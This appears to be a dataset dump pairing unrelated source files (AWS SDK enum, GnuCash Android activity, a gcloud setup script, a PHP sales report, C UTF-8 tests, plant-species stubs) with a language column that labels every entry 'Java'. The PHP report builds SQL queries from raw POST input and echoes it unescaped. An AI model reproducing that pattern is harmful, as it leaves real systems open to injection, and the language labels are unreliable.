code
stringlengths
4
1.01M
language
stringclasses
2 values
/* * Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with * the License. A copy of the License is located at * * http://aws.amazon.com/apache2.0 * * or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR * CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ package com.amazonaws.services.mediaconvert.model; import javax.annotation.Generated; /** * Use Deinterlacer (DeinterlaceMode) to choose how the service will do deinterlacing. Default is Deinterlace. - * Deinterlace converts interlaced to progressive. - Inverse telecine converts Hard Telecine 29.97i to progressive * 23.976p. - Adaptive auto-detects and converts to progressive. */ @Generated("com.amazonaws:aws-java-sdk-code-generator") public enum DeinterlacerMode { DEINTERLACE("DEINTERLACE"), INVERSE_TELECINE("INVERSE_TELECINE"), ADAPTIVE("ADAPTIVE"); private String value; private DeinterlacerMode(String value) { this.value = value; } @Override public String toString() { return this.value; } /** * Use this in place of valueOf. * * @param value * real value * @return DeinterlacerMode corresponding to the value * * @throws IllegalArgumentException * If the specified value does not map to one of the known values in this enum. */ public static DeinterlacerMode fromValue(String value) { if (value == null || "".equals(value)) { throw new IllegalArgumentException("Value cannot be null or empty!"); } for (DeinterlacerMode enumEntry : DeinterlacerMode.values()) { if (enumEntry.toString().equals(value)) { return enumEntry; } } throw new IllegalArgumentException("Cannot create enum from " + value + " value!"); } }
Java
using System; using System.Collections.Generic; using System.Linq; using System.Text; namespace Cats.Models { public class RationDetail { public int RationDetailID { get; set; } public int RationID { get; set; } public int CommodityID { get; set; } public decimal Amount { get; set; } public Nullable<int> UnitID { get; set; } public virtual Commodity Commodity { get; set; } public virtual Ration Ration { get; set; } public virtual Unit Unit { get; set; } } }
Java
if [ -z "$1" ] then echo "Usage: startup_node.sh <id_for_node>" exit fi num_gpus=$2 if [ -z "$2" ] then num_gpus=1 echo "num_gpus not specified. Defaulting to 1" fi gcloud compute --project "visualdb-1046" disks create "hackinstance-$1" --size "20" --zone "us-east1-d" --source-snapshot "hacksnapshot" --type "pd-standard" gcloud beta compute --project "visualdb-1046" instances create "hackinstance-$1" --zone "us-east1-d" --machine-type "n1-standard-4" --network "default" --metadata "ssh-keys=ubuntu:ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXJ3JrrWKc0TAM5KBXYmuTVAG06DyA8F1hHbqUULCNp767bDNN1dTF9zTo+ZDWdCuHm49XWrpRK552G8U0A55HvBEjOj4eEUSuAibd0uDAYMZr3dJNTzXNU/KfgnbJYGbRboBk3fu47D4bhKPmjX5ZDsSN++BuUYpf1bH829invPBzlGeBb/QRe3Jk9DMK/swIqFc4j6PWeOItj4/1flXFFruR/bT0p2/MIxTTAMAWlhHRYqhtia1YYMbfdv38eqZMH1GY+n7GQJTuKBDvz0qPxCus86xaE4vCawD+iQJFuD8XxppsHbc1+oCAmi5AtbUeHXjXirN95itMBi7S2evd ubuntu,node_id=$1" --maintenance-policy "TERMINATE" --service-account "50518136478-compute@developer.gserviceaccount.com" --scopes "https://www.googleapis.com/auth/cloud-platform" --accelerator type=nvidia-tesla-k80,count=$num_gpus --tags "http-server","https-server" --disk "name=hackinstance-$1,device-name=hackinstance-$1,mode=rw,boot=yes,auto-delete=yes"
Java
<!--- Provide a general summary of your changes in the Title above --> ## Description <!--- Describe your changes in detail --> ## Related Issue <!--- This project only accepts pull requests related to open issues --> <!--- If suggesting a new feature or change, please discuss it in an issue first --> <!--- If fixing a bug, there should be an issue describing it with steps to reproduce --> <!--- Please link to the issue here: --> ## Motivation and Context <!--- Why is this change required? What problem does it solve? --> ## How Has This Been Tested? <!--- Please describe in detail how you tested your changes. --> <!--- Include details of your testing environment, and the tests you ran to --> <!--- see how your change affects other areas of the code, etc. --> ## Screenshots (if appropriate): ## Types of changes <!--- What types of changes does your code introduce? Put an `x` in all the boxes that apply: --> - [ ] Bug fix (non-breaking change which fixes an issue) - [ ] New feature (non-breaking change which adds functionality) - [ ] Breaking change (fix or feature that would cause existing functionality to change) ## Checklist: <!--- Go over all the following points, and put an `x` in all the boxes that apply. --> <!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! --> - [ ] I have signed the [Adobe Open Source CLA](https://opensource.adobe.com/cla.html). - [ ] My code follows the code style of this project. - [ ] My change requires a change to the documentation. - [ ] I have updated the documentation accordingly. - [ ] I have read the **CONTRIBUTING** document. - [ ] I have added tests to cover my changes. - [ ] All new and existing tests passed.
Java
<!DOCTYPE html> <meta charset="utf-8"> <!--This page is adapted from Mike Bostock and Scott Murray's d3.js examples--> <style> .link { stroke: #ccc; } .node text { pointer-events: none; font: 10px sans-serif; } </style> <body> <script src="http://d3js.org/d3.v3.min.js"></script> <script> var width = 960; var height = 600; var colors = d3.scale.category10(); var svg = d3.select("body").append("svg") .attr("width", width) .attr("height", height); var force = d3.layout.force() .gravity(.25) .distance(50) .charge(-300) .size([width, height]); svg.append("text").attr("id", "tooltip"); d3.json("graph.json", function(error, json) { force .nodes(json.nodes) .links(json.links) .start(); var link = svg.selectAll(".link") .data(json.links) .enter().append("line") .attr("class", "link"); var node = svg.selectAll(".node") .data(json.nodes) .enter().append("g") .attr("class", "node") .call(force.drag); node.append("circle") .attr("x", -8) .attr("y", -8) .attr("r", function(d){ return 1 + Math.sqrt(Math.pow(1.6, d.degree)/Math.PI) ; } ) .style("fill", function(d, i){ return colors(i); } ) .on("mouseover", function(d){ var xPosition = d3.event.clientX; var yPosition = d3.event.clientY; d3.select("#tooltip").remove(); svg.append("text") .attr("id", "tooltip") .attr("x", xPosition) .attr("y", yPosition) .attr("text-anchor", "middle") .attr("font-family", "sans-serif") .attr("font-size", "11px") .attr("font-weight", "bold") .attr("fill", "black") .text(d.name + "(@" + d.scr_name + "), followed by " + d.degree + " users"); } ) .on("mouseout", function(){ d3.select("#tooltip") .transition() .delay(1500) .text(""); } ) ; force.on("tick", function() { link.attr("x1", function(d) { return d.source.x; }) .attr("y1", function(d) { return d.source.y; }) .attr("x2", function(d) { return d.target.x; }) .attr("y2", function(d) { return d.target.y; }); node.attr("transform", function(d) { return "translate(" + d.x + "," + d.y + ")"; }); }); }); </script> </body> </html>
Java
<div id="print_area" style="width:200px; font-size:12px;"> <?php include('dbcon_s.php'); $date=date('Y-m-d', $time_now); if($_POST['h_status']=='off') { $query=mysql_query("select count(*) as num_order, sum(person) as total_person, sum(order_total) as total_order, sum(discount) as total_discount, sum(ser_charge) as total_s_charge, sum(vat_total) as total_vat, sum(cash) as total_cash, date from order_list where status='false' AND date='$date' AND terminal='".$_POST['terminal']."'"); } else { $query=mysql_query("select count(*) as num_order, sum(person) as total_person, sum(order_total) as total_order, sum(discount) as total_discount, sum(ser_charge) as total_s_charge, sum(vat_total) as total_vat, sum(cash) as total_cash, date from order_list where status='false' AND date='$date' AND terminal='".$_POST['terminal']."'"); } $row=mysql_fetch_array($query); ?> <h2 style="text-align:center; font-family:Forte; margin:0px; padding:0px;">La Bamba</h2> <p style="text-align:center; margin:0px; font-size:12px;"> House # 54, Road # 20,<br /> Sector # 03, Rabindra Sarani<br /> Uttara, Dhaka-1230<br /> Phone : 01759783896-7<br /> Vat Reg No: 5111110711 </p> <p style="text-align:center; margin:0px; font-size:12px;"> Day Report (<?php echo $_POST['terminal']; ?>) </p> Report Date : <?php echo $row['date']; ?><br /> Print Date : <?php echo $date; ?><br /> <table cellspacing="0" style="width:100%; font-size:12px;"> <tr> <th style="text-align:left">Number of order:</th> <th style="text-align:left;"><?php echo $row['num_order']; ?></th> </tr> <tr> <th style="text-align:left">Total Person:</th> <th style="text-align:left;"><?php echo $row['total_person']; ?></th> </tr> <tr> <th style="text-align:left">Total Order:</th> <th style="text-align:left;"><?php echo $row['total_order']; ?></th> </tr> <tr> <th style="text-align:left">Total Discount:</th> <th style="text-align:left;"><?php echo $row['total_discount']; ?></th> </tr> <tr> <th style="text-align:left">Total Service Charge:</th> <th 
style="text-align:left;"><?php echo $row['total_s_charge']; ?></th> </tr> <tr> <th style="text-align:left">Total Vat:</th> <th style="text-align:left;"><?php echo $row['total_vat']; ?></th> </tr> <tr> <th style="text-align:left">Total Cash:</th> <th style="text-align:left;"><?php echo $row['total_cash']; ?></th> </tr> </table> <br /> <div style="border-bottom:1px dotted #000;"></div> <br /> Day report (<?php echo $_POST['terminal']; ?>) printed by : <?php echo $_POST['user']; ?> </div>
Java
/* * Copyright (c) 2015 Ngewi Fet <ngewif@gmail.com> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.gnucash.android.ui.common; import android.app.Activity; import android.content.Intent; import android.content.SharedPreferences; import android.content.res.Configuration; import android.database.Cursor; import android.graphics.Color; import android.graphics.PorterDuff; import android.os.Build; import android.os.Bundle; import android.preference.PreferenceManager; import android.support.annotation.LayoutRes; import android.support.annotation.StringRes; import android.support.design.widget.NavigationView; import android.support.v4.widget.DrawerLayout; import android.support.v7.app.ActionBar; import android.support.v7.app.ActionBarDrawerToggle; import android.support.v7.widget.PopupMenu; import android.support.v7.widget.Toolbar; import android.view.Menu; import android.view.MenuItem; import android.view.View; import android.widget.ProgressBar; import android.widget.TextView; import com.uservoice.uservoicesdk.UserVoice; import org.gnucash.android.R; import org.gnucash.android.app.GnuCashApplication; import org.gnucash.android.db.DatabaseSchema; import org.gnucash.android.db.adapter.BooksDbAdapter; import org.gnucash.android.ui.account.AccountsActivity; import org.gnucash.android.ui.passcode.PasscodeLockActivity; import org.gnucash.android.ui.report.ReportsActivity; import org.gnucash.android.ui.settings.PreferenceActivity; import 
org.gnucash.android.ui.transaction.ScheduledActionsActivity; import butterknife.BindView; import butterknife.ButterKnife; /** * Base activity implementing the navigation drawer, to be extended by all activities requiring one. * <p> * Each activity inheriting from this class has an indeterminate progress bar at the top, * (above the action bar) which can be used to display busy operations. See {@link #getProgressBar()} * </p> * * <p>Sub-classes should simply provide their layout using {@link #getContentView()} and then annotate * any variables they wish to use with {@link ButterKnife#bind(Activity)} annotations. The view * binding will be done in this base abstract class.<br> * The activity layout of the subclass is expected to contain {@code DrawerLayout} and * a {@code NavigationView}.<br> * Sub-class should also consider using the {@code toolbar.xml} or {@code toolbar_with_spinner.xml} * for the action bar in their XML layout. Otherwise provide another which contains widgets for the * toolbar and progress indicator with the IDs {@code R.id.toolbar} and {@code R.id.progress_indicator} respectively. 
* </p> * @author Ngewi Fet <ngewif@gmail.com> */ public abstract class BaseDrawerActivity extends PasscodeLockActivity implements PopupMenu.OnMenuItemClickListener { public static final int ID_MANAGE_BOOKS = 0xB00C; @BindView(R.id.drawer_layout) DrawerLayout mDrawerLayout; @BindView(R.id.nav_view) NavigationView mNavigationView; @BindView(R.id.toolbar) Toolbar mToolbar; @BindView(R.id.toolbar_progress) ProgressBar mToolbarProgress; protected TextView mBookNameTextView; protected ActionBarDrawerToggle mDrawerToggle; public static final int REQUEST_OPEN_DOCUMENT = 0x20; private class DrawerItemClickListener implements NavigationView.OnNavigationItemSelectedListener { @Override public boolean onNavigationItemSelected(MenuItem menuItem) { onDrawerMenuItemClicked(menuItem.getItemId()); return true; } } @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(getContentView()); //if a parameter was passed to open an account within a specific book, then switch String bookUID = getIntent().getStringExtra(UxArgument.BOOK_UID); if (bookUID != null && !bookUID.equals(BooksDbAdapter.getInstance().getActiveBookUID())){ GnuCashApplication.activateBook(bookUID); } ButterKnife.bind(this); setSupportActionBar(mToolbar); final ActionBar actionBar = getSupportActionBar(); if (actionBar != null){ actionBar.setHomeButtonEnabled(true); actionBar.setDisplayHomeAsUpEnabled(true); actionBar.setTitle(getTitleRes()); } mToolbarProgress.getIndeterminateDrawable().setColorFilter(Color.WHITE, PorterDuff.Mode.SRC_IN); View headerView = mNavigationView.getHeaderView(0); headerView.findViewById(R.id.drawer_title).setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { onClickAppTitle(v); } }); mBookNameTextView = (TextView) headerView.findViewById(R.id.book_name); mBookNameTextView.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { onClickBook(v); } }); 
updateActiveBookName(); setUpNavigationDrawer(); } @Override protected void onResume() { super.onResume(); updateActiveBookName(); } /** * Return the layout to inflate for this activity * @return Layout resource identifier */ public abstract @LayoutRes int getContentView(); /** * Return the title for this activity. * This will be displayed in the action bar * @return String resource identifier */ public abstract @StringRes int getTitleRes(); /** * Returns the progress bar for the activity. * <p>This progress bar is displayed above the toolbar and should be used to show busy status * for long operations.<br/> * The progress bar visibility is set to {@link View#GONE} by default. Make visible to use </p> * @return Indeterminate progress bar. */ public ProgressBar getProgressBar(){ return mToolbarProgress; } /** * Sets up the navigation drawer for this activity. */ private void setUpNavigationDrawer() { mNavigationView.setNavigationItemSelectedListener(new DrawerItemClickListener()); mDrawerToggle = new ActionBarDrawerToggle( this, /* host Activity */ mDrawerLayout, /* DrawerLayout object */ R.string.drawer_open, /* "open drawer" description */ R.string.drawer_close /* "close drawer" description */ ) { /** Called when a drawer has settled in a completely closed state. */ public void onDrawerClosed(View view) { super.onDrawerClosed(view); } /** Called when a drawer has settled in a completely open state. 
*/ public void onDrawerOpened(View drawerView) { super.onDrawerOpened(drawerView); } }; mDrawerLayout.setDrawerListener(mDrawerToggle); } @Override protected void onPostCreate(Bundle savedInstanceState) { super.onPostCreate(savedInstanceState); mDrawerToggle.syncState(); } @Override public void onConfigurationChanged(Configuration newConfig) { super.onConfigurationChanged(newConfig); mDrawerToggle.onConfigurationChanged(newConfig); } @Override public boolean onOptionsItemSelected(MenuItem item) { if (item.getItemId() == android.R.id.home){ if (!mDrawerLayout.isDrawerOpen(mNavigationView)) mDrawerLayout.openDrawer(mNavigationView); else mDrawerLayout.closeDrawer(mNavigationView); return true; } return super.onOptionsItemSelected(item); } /** * Update the display name of the currently active book */ protected void updateActiveBookName(){ mBookNameTextView.setText(BooksDbAdapter.getInstance().getActiveBookDisplayName()); } /** * Handler for the navigation drawer items * */ protected void onDrawerMenuItemClicked(int itemId) { switch (itemId){ case R.id.nav_item_open: { //Open... 
files if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT){ //use the storage access framework Intent openDocument = new Intent(Intent.ACTION_OPEN_DOCUMENT); openDocument.addCategory(Intent.CATEGORY_OPENABLE); openDocument.setType("*/*"); startActivityForResult(openDocument, REQUEST_OPEN_DOCUMENT); } else { AccountsActivity.startXmlFileChooser(this); } } break; case R.id.nav_item_favorites: { //favorite accounts Intent intent = new Intent(this, AccountsActivity.class); intent.putExtra(AccountsActivity.EXTRA_TAB_INDEX, AccountsActivity.INDEX_FAVORITE_ACCOUNTS_FRAGMENT); intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP|Intent.FLAG_ACTIVITY_SINGLE_TOP); startActivity(intent); } break; case R.id.nav_item_reports: { Intent intent = new Intent(this, ReportsActivity.class); intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP | Intent.FLAG_ACTIVITY_SINGLE_TOP); startActivity(intent); } break; /* //todo: Re-enable this when Budget UI is complete case R.id.nav_item_budgets: startActivity(new Intent(this, BudgetsActivity.class)); break; */ case R.id.nav_item_scheduled_actions: { //show scheduled transactions Intent intent = new Intent(this, ScheduledActionsActivity.class); intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TOP | Intent.FLAG_ACTIVITY_SINGLE_TOP); startActivity(intent); } break; case R.id.nav_item_export: AccountsActivity.openExportFragment(this); break; case R.id.nav_item_settings: //Settings activity startActivity(new Intent(this, PreferenceActivity.class)); break; case R.id.nav_item_help: SharedPreferences prefs = PreferenceManager.getDefaultSharedPreferences(this); prefs.edit().putBoolean(UxArgument.SKIP_PASSCODE_SCREEN, true).apply(); UserVoice.launchUserVoice(this); break; } mDrawerLayout.closeDrawer(mNavigationView); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { if (resultCode == Activity.RESULT_CANCELED) { super.onActivityResult(requestCode, resultCode, data); return; } switch (requestCode) { case 
AccountsActivity.REQUEST_PICK_ACCOUNTS_FILE: AccountsActivity.importXmlFileFromIntent(this, data, null); break; case BaseDrawerActivity.REQUEST_OPEN_DOCUMENT: //this uses the Storage Access Framework final int takeFlags = data.getFlags() & (Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION); AccountsActivity.importXmlFileFromIntent(this, data, null); getContentResolver().takePersistableUriPermission(data.getData(), takeFlags); break; default: super.onActivityResult(requestCode, resultCode, data); break; } } @Override public boolean onMenuItemClick(MenuItem item) { long id = item.getItemId(); if (id == ID_MANAGE_BOOKS){ Intent intent = new Intent(this, PreferenceActivity.class); intent.setAction(PreferenceActivity.ACTION_MANAGE_BOOKS); startActivity(intent); mDrawerLayout.closeDrawer(mNavigationView); return true; } BooksDbAdapter booksDbAdapter = BooksDbAdapter.getInstance(); String bookUID = booksDbAdapter.getUID(id); if (!bookUID.equals(booksDbAdapter.getActiveBookUID())){ GnuCashApplication.loadBook(bookUID); finish(); } AccountsActivity.start(GnuCashApplication.getAppContext()); return true; } public void onClickAppTitle(View view){ mDrawerLayout.closeDrawer(mNavigationView); AccountsActivity.start(this); } public void onClickBook(View view){ PopupMenu popup = new PopupMenu(this, view); popup.setOnMenuItemClickListener(this); Menu menu = popup.getMenu(); int maxRecent = 0; Cursor cursor = BooksDbAdapter.getInstance().fetchAllRecords(null, null, DatabaseSchema.BookEntry.COLUMN_MODIFIED_AT + " DESC"); while (cursor.moveToNext() && maxRecent++ < 5) { long id = cursor.getLong(cursor.getColumnIndexOrThrow(DatabaseSchema.BookEntry._ID)); String name = cursor.getString(cursor.getColumnIndexOrThrow(DatabaseSchema.BookEntry.COLUMN_DISPLAY_NAME)); menu.add(0, (int)id, maxRecent, name); } menu.add(0, ID_MANAGE_BOOKS, maxRecent, R.string.menu_manage_books); popup.show(); } }
Java
/* Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <string.h> #define CFISH_USE_SHORT_NAMES #define TESTCFISH_USE_SHORT_NAMES #include "Clownfish/Test/Util/TestStringHelper.h" #include "Clownfish/String.h" #include "Clownfish/Err.h" #include "Clownfish/Test.h" #include "Clownfish/TestHarness/TestBatchRunner.h" #include "Clownfish/Util/StringHelper.h" #include "Clownfish/Class.h" /* This alternative implementation of utf8_valid() is (presumably) slower, but * it implements the standard in a more linear, easy-to-grok way. 
*/ #define TRAIL_OK(n) (n >= 0x80 && n <= 0xBF) TestStringHelper* TestStrHelp_new() { return (TestStringHelper*)Class_Make_Obj(TESTSTRINGHELPER); } static bool S_utf8_valid_alt(const char *maybe_utf8, size_t size) { const uint8_t *string = (const uint8_t*)maybe_utf8; const uint8_t *const end = string + size; while (string < end) { int count = StrHelp_UTF8_COUNT[*string]; bool valid = false; if (count == 1) { if (string[0] <= 0x7F) { valid = true; } } else if (count == 2) { if (string[0] >= 0xC2 && string[0] <= 0xDF) { if (TRAIL_OK(string[1])) { valid = true; } } } else if (count == 3) { if (string[0] == 0xE0) { if (string[1] >= 0xA0 && string[1] <= 0xBF && TRAIL_OK(string[2]) ) { valid = true; } } else if (string[0] >= 0xE1 && string[0] <= 0xEC) { if (TRAIL_OK(string[1]) && TRAIL_OK(string[2]) ) { valid = true; } } else if (string[0] == 0xED) { if (string[1] >= 0x80 && string[1] <= 0x9F && TRAIL_OK(string[2]) ) { valid = true; } } else if (string[0] >= 0xEE && string[0] <= 0xEF) { if (TRAIL_OK(string[1]) && TRAIL_OK(string[2]) ) { valid = true; } } } else if (count == 4) { if (string[0] == 0xF0) { if (string[1] >= 0x90 && string[1] <= 0xBF && TRAIL_OK(string[2]) && TRAIL_OK(string[3]) ) { valid = true; } } else if (string[0] >= 0xF1 && string[0] <= 0xF3) { if (TRAIL_OK(string[1]) && TRAIL_OK(string[2]) && TRAIL_OK(string[3]) ) { valid = true; } } else if (string[0] == 0xF4) { if (string[1] >= 0x80 && string[1] <= 0x8F && TRAIL_OK(string[2]) && TRAIL_OK(string[3]) ) { valid = true; } } } if (!valid) { return false; } string += count; } if (string != end) { return false; } return true; } static void test_overlap(TestBatchRunner *runner) { size_t result; result = StrHelp_overlap("", "", 0, 0); TEST_INT_EQ(runner, result, 0, "two empty strings"); result = StrHelp_overlap("", "foo", 0, 3); TEST_INT_EQ(runner, result, 0, "first string is empty"); result = StrHelp_overlap("foo", "", 3, 0); TEST_INT_EQ(runner, result, 0, "second string is empty"); result = 
StrHelp_overlap("foo", "foo", 3, 3); TEST_INT_EQ(runner, result, 3, "equal strings"); result = StrHelp_overlap("foo bar", "foo", 7, 3); TEST_INT_EQ(runner, result, 3, "first string is longer"); result = StrHelp_overlap("foo", "foo bar", 3, 7); TEST_INT_EQ(runner, result, 3, "second string is longer"); } static void test_to_base36(TestBatchRunner *runner) { char buffer[StrHelp_MAX_BASE36_BYTES]; StrHelp_to_base36(UINT64_MAX, buffer); TEST_STR_EQ(runner, "3w5e11264sgsf", buffer, "base36 UINT64_MAX"); StrHelp_to_base36(1, buffer); TEST_STR_EQ(runner, "1", buffer, "base36 1"); TEST_INT_EQ(runner, buffer[1], 0, "base36 NULL termination"); } static void test_utf8_round_trip(TestBatchRunner *runner) { int32_t code_point; for (code_point = 0; code_point <= 0x10FFFF; code_point++) { char buffer[4]; uint32_t size = StrHelp_encode_utf8_char(code_point, buffer); char *start = buffer; char *end = start + size; // Verify length returned by encode_utf8_char(). if (size != StrHelp_UTF8_COUNT[(unsigned char)buffer[0]]) { break; } // Verify that utf8_valid() agrees with alternate implementation. if (!!StrHelp_utf8_valid(start, size) != !!S_utf8_valid_alt(start, size) ) { break; } // Verify back_utf8_char(). if (StrHelp_back_utf8_char(end, start) != start) { break; } // Verify round trip of encode/decode. 
if (StrHelp_decode_utf8_char(buffer) != code_point) { break; } } if (code_point == 0x110000) { PASS(runner, "Successfully round tripped 0 - 0x10FFFF"); } else { FAIL(runner, "Failed round trip at 0x%.1X", (unsigned)code_point); } } static void S_test_validity(TestBatchRunner *runner, const char *content, size_t size, bool expected, const char *description) { bool sane = StrHelp_utf8_valid(content, size); bool double_check = S_utf8_valid_alt(content, size); if (sane != double_check) { FAIL(runner, "Disagreement: %s", description); } else { TEST_TRUE(runner, sane == expected, "%s", description); } } static void test_utf8_valid(TestBatchRunner *runner) { // Musical symbol G clef: // Code point: U+1D11E // UTF-16: 0xD834 0xDD1E // UTF-8 0xF0 0x9D 0x84 0x9E S_test_validity(runner, "\xF0\x9D\x84\x9E", 4, true, "Musical symbol G clef"); S_test_validity(runner, "\xED\xA0\xB4\xED\xB4\x9E", 6, false, "G clef as UTF-8 encoded UTF-16 surrogates"); S_test_validity(runner, ".\xED\xA0\xB4.", 5, false, "Isolated high surrogate"); S_test_validity(runner, ".\xED\xB4\x9E.", 5, false, "Isolated low surrogate"); // Shortest form. S_test_validity(runner, ".\xC1\x9C.", 4, false, "Non-shortest form ASCII backslash"); S_test_validity(runner, ".\xC0\xAF.", 4, false, "Non-shortest form ASCII slash"); S_test_validity(runner, ".\xC0\x80.", 4, false, "Non-shortest form ASCII NUL character"); // Range. S_test_validity(runner, "\xF8\x88\x80\x80\x80", 5, false, "5-byte UTF-8"); // Bad continuations. 
S_test_validity(runner, "\xE2\x98\xBA\xE2\x98\xBA", 6, true, "SmileySmiley"); S_test_validity(runner, "\xE2\xBA\xE2\x98\xBA", 5, false, "missing first continuation byte"); S_test_validity(runner, "\xE2\x98\xE2\x98\xBA", 5, false, "missing second continuation byte"); S_test_validity(runner, "\xE2\xE2\x98\xBA", 4, false, "missing both continuation bytes"); S_test_validity(runner, "\xBA\xE2\x98\xBA\xE2\xBA", 5, false, "missing first continuation byte (end)"); S_test_validity(runner, "\xE2\x98\xBA\xE2\x98", 5, false, "missing second continuation byte (end)"); S_test_validity(runner, "\xE2\x98\xBA\xE2", 4, false, "missing both continuation bytes (end)"); S_test_validity(runner, "\xBA\xE2\x98\xBA", 4, false, "isolated continuation byte 0xBA"); S_test_validity(runner, "\x98\xE2\x98\xBA", 4, false, "isolated continuation byte 0x98"); S_test_validity(runner, "\xE2\x98\xBA\xBA", 4, false, "isolated continuation byte 0xBA (end)"); S_test_validity(runner, "\xE2\x98\xBA\x98", 4, false, "isolated continuation byte 0x98 (end)"); } static void test_is_whitespace(TestBatchRunner *runner) { TEST_TRUE(runner, StrHelp_is_whitespace(' '), "space is whitespace"); TEST_TRUE(runner, StrHelp_is_whitespace('\n'), "newline is whitespace"); TEST_TRUE(runner, StrHelp_is_whitespace('\t'), "tab is whitespace"); TEST_TRUE(runner, StrHelp_is_whitespace('\v'), "vertical tab is whitespace"); TEST_FALSE(runner, StrHelp_is_whitespace('a'), "'a' isn't whitespace"); TEST_FALSE(runner, StrHelp_is_whitespace(0), "NULL isn't whitespace"); TEST_FALSE(runner, StrHelp_is_whitespace(0x263A), "Smiley isn't whitespace"); } static void test_back_utf8_char(TestBatchRunner *runner) { char buffer[4]; char *buf = buffer + 1; uint32_t len = StrHelp_encode_utf8_char(0x263A, buffer); char *end = buffer + len; TEST_TRUE(runner, StrHelp_back_utf8_char(end, buffer) == buffer, "back_utf8_char"); TEST_TRUE(runner, StrHelp_back_utf8_char(end, buf) == NULL, "back_utf8_char returns NULL rather than back up beyond start"); 
TEST_TRUE(runner, StrHelp_back_utf8_char(buffer, buffer) == NULL, "back_utf8_char returns NULL when end == start"); } void TestStrHelp_Run_IMP(TestStringHelper *self, TestBatchRunner *runner) { TestBatchRunner_Plan(runner, (TestBatch*)self, 39); test_overlap(runner); test_to_base36(runner); test_utf8_round_trip(runner); test_utf8_valid(runner); test_is_whitespace(runner); test_back_utf8_char(runner); }
Java
# Gardenia squamifera R.D.Good SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
# Agassizia cheiranthifolia Spach SPECIES #### Status ACCEPTED #### According to International Plant Names Index #### Published in null #### Original name null ### Remarks null
Java
# Quercus cryptoneuron H.Lév. SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
# Pirigara globosa Span. SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
// Return the named/indexed child frame of the current window.
function $childNode(o) { return window.frames[o] }

// Attach a hover animation: on mouse-enter add "animated <e>" CSS classes,
// on mouse-leave remove them after a 2-second delay (2e3 ms) so the
// animation can finish playing.
function animationHover(o, e) { o = $(o), o.hover(function () { o.addClass("animated " + e) }, function () { window.setTimeout(function () { o.removeClass("animated " + e) }, 2e3) }) }

// Make every "[class*=col]" container sortable by dragging its ".ibox-title"
// handle; panels can be dropped into any other column container.
// Relies on the jQuery UI sortable plugin.
function WinMove() { var o = "[class*=col]", e = ".ibox-title", i = "[class*=col]"; $(o).sortable({ handle: e, connectWith: i, tolerance: "pointer", forcePlaceholderSize: !0, opacity: .8 }).disableSelection() }

// Document of the parent frame (used elsewhere when running inside an iframe).
var $parentNode = window.parent.document;

// One-time page wiring.  NOTE: the whole setup runs inside the if-condition
// via the comma operator; the condition's final operand is "top == this"
// (i.e. "not inside a frame"), and the if-body is intentionally empty.
// Wiring performed: tooltip delegation, moving modals to <body>, popovers,
// ibox collapse toggle (slide + chevron swap + deferred resize for embedded
// maps), and ibox close/remove.
if ($(".tooltip-demo").tooltip({ selector: "[data-toggle=tooltip]", container: "body" }), $(".modal").appendTo("body"), $("[data-toggle=popover]").popover(), $(".collapse-link").click(function () { var o = $(this).closest("div.ibox"), e = $(this).find("i"), i = o.find("div.ibox-content"); i.slideToggle(200), e.toggleClass("fa-chevron-up").toggleClass("fa-chevron-down"), o.toggleClass("").toggleClass("border-bottom"), setTimeout(function () { o.resize(), o.find("[id^=map-]").resize() }, 50) }), $(".close-link").click(function () { var o = $(this).closest("div.ibox"); o.remove() }), top == this) { }
Java
# Crepidium kerintjiense (J.J.Sm.) Szlach. SPECIES #### Status ACCEPTED #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name Microstylis kerintjiensis J.J.Sm. ### Remarks null
Java
# Stylochaeton zenkeri Engl. SPECIES #### Status ACCEPTED #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
